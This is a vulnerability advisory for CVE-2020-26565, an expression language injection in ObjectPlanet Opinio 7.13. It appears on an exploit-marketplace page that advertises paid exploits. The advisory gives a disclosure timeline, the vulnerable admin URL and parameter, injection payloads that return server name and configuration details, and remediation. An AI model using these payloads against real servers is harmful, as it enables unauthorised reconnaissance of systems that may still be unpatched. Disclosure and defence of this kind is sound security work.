0day.today - Biggest Exploit Database in the World.
- We use one main domain: http://0day.today
- Most of the materials is completely FREE
- If you want to purchase the exploit / get V.I.P. access or pay for any other service,
you need to buy or earn
GOLD
Administration of this site uses the official contacts. Beware of impostors!
We DO NOT use Telegram or any messengers / social networks!Please, beware of scammers!
- Read the [ agreement ]
- Read the [ Submit ] rules
- Visit the [ faq ] page
- [ Register ] profile
- Get [ GOLD ]
- If you want to [ sell ]
- If you want to [ buy ]
- If you lost [ Account ]
- Any questions [ admin@0day.today ]
- Authorisation page
- Registration page
- Restore account page
- FAQ page
- Contacts page
- Publishing rules
- Agreement page
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
Contact us
You can contact us by:
Mail:
Facebook:
Twitter:
Telegram:
We DO NOT use Telegram or any messengers / social networks!
ObjectPlanet Opinio 7.13 Expression Language Injection Vulnerability
Author
Risk
[Security Risk Medium
]0day-ID
Category
Date add
CVE
Platform
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng
# CVE: CVE-2020-26565
# Exploit Title: ObjectPlanet Opinio version 7.13 allows expression language injection
# Vendor Homepage: https://www.objectplanet.com/opinio/
# Software Link: https://www.objectplanet.com/opinio/
# Exploit Authors: Timothy Tan , Daniel Tan, Yu EnHui, Khor Yong Heng
# CVE: CVE-2020-26565
# Timeline
- September 2020: Initial discovery
- October 2020: Reported to ObjectPlanet
- November 2020: Fix/patch provided by ObjectPlanet
- July 2021: CVE-2020-26565
# 1. Introduction
Opinio is a survey management solution by ObjectPlanet that allows surveys to be designed, published and managed.
# 2. Vulnerability Details
ObjectPlanet Opinio before version 7.13 is vulnerable to expression language injection
# 3. Proof of Concept
### Expression Language Injection leading to sensitive information disclosure ###
Step 1:
URL: /opinio/admin/permissionList.do?userId=1&from=$%7b7%2a7%7d
Payload: ${7*7} - URL encoded
The "from" parameter is vulnerable to Expression Language injection and this was validated by inspecting the loaded page source which executed the URL encoded payload to return 49
This vulnerability can be used to enumerate the sensitive information about the web server. Some examples of payloads that executed successfully are:
- ${pageContext.request.serverName} - returned server name
- ${pageContext.serveletContext.serverInfo} - returned server information
- ${pageContext.servletConfig.class} - returned information about the Apache server
This vulnerability was confirmed by ObjectPlanet Opinio in their patch notes which can be found at : https://www.objectplanet.com/opinio/changelog.html
-------------------------------------------------------
# 4. Remediation
Apply the latest fix/patch from objectplanet.
# 5. Credits
Timothy Tan (https://sg.linkedin.com/in/timtjh)
Khor Yong Heng (https://www.linkedin.com/in/khor-yong-heng-66108a120/)
Yu EnHui (https://www.linkedin.com/in/enhui-yu-88691b15b/)
Daniel Tan (https://www.linkedin.com/in/dantanjk/)
# 0day.today [2024-11-15] #